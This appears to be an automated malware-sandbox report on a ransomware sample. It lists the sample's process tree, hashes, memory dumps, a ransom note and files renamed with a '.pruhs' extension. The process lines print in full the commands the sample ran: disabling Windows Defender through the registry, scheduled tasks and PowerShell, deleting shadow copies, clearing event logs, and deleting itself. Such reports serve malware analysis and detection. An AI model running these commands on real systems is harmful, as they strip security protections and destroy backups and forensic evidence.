C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a84r_HOW_TO_DECRYPT.txt
C:\Windows\SysWOW64\notepad.exe
notepad.exe C:\a84r_HOW_TO_DECRYPT.txt
C:\Windows\SysWOW64\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"
Network
Files
memory/584-54-0x0000000000000000-mapping.dmp
memory/460-55-0x0000000000000000-mapping.dmp
memory/696-56-0x0000000000000000-mapping.dmp
memory/560-57-0x0000000000000000-mapping.dmp
memory/1480-58-0x0000000000000000-mapping.dmp
memory/1364-59-0x0000000000000000-mapping.dmp
memory/520-60-0x0000000000000000-mapping.dmp
memory/1704-61-0x0000000000000000-mapping.dmp
memory/364-62-0x0000000000000000-mapping.dmp
memory/1212-63-0x0000000000000000-mapping.dmp
memory/632-64-0x0000000000000000-mapping.dmp
memory/1956-65-0x0000000000000000-mapping.dmp
memory/1972-66-0x0000000000000000-mapping.dmp
memory/1284-67-0x0000000000000000-mapping.dmp
memory/1544-68-0x0000000000000000-mapping.dmp
memory/1592-69-0x0000000000000000-mapping.dmp
memory/1492-70-0x0000000000000000-mapping.dmp
memory/1632-71-0x0000000000000000-mapping.dmp
memory/1708-72-0x0000000000000000-mapping.dmp
memory/1712-73-0x0000000000000000-mapping.dmp
memory/1780-74-0x0000000000000000-mapping.dmp
memory/1768-75-0x0000000000000000-mapping.dmp
memory/1612-76-0x0000000000000000-mapping.dmp
memory/872-77-0x0000000000000000-mapping.dmp
memory/608-78-0x0000000000000000-mapping.dmp
memory/1368-79-0x0000000000000000-mapping.dmp
memory/636-80-0x0000000000000000-mapping.dmp
memory/1840-81-0x0000000000000000-mapping.dmp
memory/1552-82-0x0000000000000000-mapping.dmp
memory/1956-83-0x0000000000000000-mapping.dmp
memory/1504-84-0x0000000000000000-mapping.dmp
memory/2004-85-0x0000000000000000-mapping.dmp
memory/1628-86-0x0000000000000000-mapping.dmp
memory/1652-87-0x0000000000000000-mapping.dmp
memory/1496-88-0x0000000000000000-mapping.dmp
memory/1760-89-0x0000000000000000-mapping.dmp
memory/856-90-0x0000000000000000-mapping.dmp
memory/1172-91-0x0000000000000000-mapping.dmp
memory/580-92-0x0000000000000000-mapping.dmp
memory/984-93-0x0000000000000000-mapping.dmp
memory/1640-94-0x0000000000000000-mapping.dmp
memory/1084-95-0x0000000000000000-mapping.dmp
memory/1616-96-0x0000000000000000-mapping.dmp
memory/1564-97-0x0000000000000000-mapping.dmp
memory/1200-98-0x0000000000000000-mapping.dmp
memory/1716-99-0x0000000000000000-mapping.dmp
memory/1584-100-0x0000000000000000-mapping.dmp
memory/576-101-0x0000000000000000-mapping.dmp
memory/1360-102-0x0000000000000000-mapping.dmp
memory/1072-103-0x0000000000000000-mapping.dmp
memory/1944-104-0x0000000000000000-mapping.dmp
memory/1836-105-0x0000000000000000-mapping.dmp
memory/1752-106-0x0000000000000000-mapping.dmp
memory/1604-107-0x0000000000000000-mapping.dmp
memory/560-108-0x0000000000000000-mapping.dmp
memory/1212-109-0x0000000000000000-mapping.dmp
memory/1540-110-0x0000000000000000-mapping.dmp
memory/1764-111-0x0000000000000000-mapping.dmp
memory/1356-112-0x0000000000000000-mapping.dmp
memory/1884-113-0x0000000000000000-mapping.dmp
memory/304-114-0x0000000000000000-mapping.dmp
memory/980-115-0x0000000000000000-mapping.dmp
memory/1308-116-0x0000000000000000-mapping.dmp
memory/2084-117-0x0000000000000000-mapping.dmp
memory/2140-118-0x0000000076491000-0x0000000076493000-memory.dmp
memory/2140-119-0x00000000002E0000-0x00000000002E1000-memory.dmp
memory/2140-121-0x00000000002E2000-0x00000000002E4000-memory.dmp
memory/2140-120-0x00000000002E1000-0x00000000002E2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 7ecfb94b8b77105698aa7fff99aac358 |
| SHA1 | 6d598804804ec9ec2dc1bb70159a22de4dd9e942 |
| SHA256 | d57ec17500aea8a048efd62c919c4d150f74e44ed778f7be7985bea2696665b5 |
| SHA512 | 3f8adab343f1997fb12b6df9ac7ff19b9ab100c74f25785c4e70739e52454bbc7dd726184671729fffd993aa2b96fc0f6954d27a4c3d987ac7e3a4c7c503e1d5 |
memory/2220-124-0x00000000023A0000-0x0000000002FEA000-memory.dmp
memory/2536-125-0x000007FEFC451000-0x000007FEFC453000-memory.dmp
C:\Users\Admin\Desktop\a84r_HOW_TO_DECRYPT.txt
| MD5 | 5f00eabb52cff99b488fd8202cb2ad3a |
| SHA1 | cd7d4f0d9fff26b1611cb2ef2f9c82068f5e9578 |
| SHA256 | 282c1b1267b62b839a830fa1e36cea4a79d65ed73d696050f3478fe514d44ba2 |
| SHA512 | d0c9bc686b17a8faa66cd08ca4c80deac20ca93e5b89b9750ed6a4da2cd426ca5901ef44ba6930cb19e386f30c56fc11a6a6bfd9f40e88fa77d0c1fe8e2355ee |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-10 16:44
Reported
2022-01-10 16:47
Platform
win10-en-20211208
Max time kernel
50s
Max time network
147s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\Lang\sk.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_QmspYuG7Byw0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\.lastModified.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_3C212I7CBK40.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_CPyXVFY5Pik0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Ba8lWb03vhw0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7ES.LEX.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_N6u5fKWsb3U0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\SATIN.ELM.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_aZCB-I6oalQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_pImch74ef8E0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_kOk2jyfpybI0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.White.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_WZXP1n9ZEb00.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_zgARkwTO-bw0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_X5MLfLlFXIM0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\accessibility.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_oUK2E2hv1Vs0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_WNlTk7D1pXE0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_XmEgC8bpu7k0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_9CG2zFqQVro0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_VG62s1phjxM0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_H9C8yBfwHB80.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ja.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_-hOLDxEIZV00.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_7Gx88OuUQqE0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_ALINXfMDRlY0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_ELQ-aUqS1Bg0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial3-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_pc0jXXDtiro0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\jvmticmlr.h.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_UebgeXh69sY0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_h0lpPLemYIQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\client_eula.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_44yL7ndjMz40.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime2019_eula.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_X7AwMIxi4mw0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\PREVIEW.GIF.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_4lyZ98RYmNk0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_qZ2axiECZPY0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\resources.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_NSEyg4DibWE0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_qRFzL7LNoBQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_LkcXR5peBRM0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.wordmui.msi.16.en-us.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_g1wOJ8DO-fY0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Y5ag8w5zjP00.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Trial-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_1LCaHKBTY600.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\et-EE\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_A0Erb8A57dE0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_KsOwxpR6ynY0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_gqzlWCWiiHQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_KMS_Client-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_AoNNcuCuRmw0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_i7TT44knjxQ0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN121.XML.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_MoOPI_F5g6s0.pruhs | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ar-SA\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | N/A |
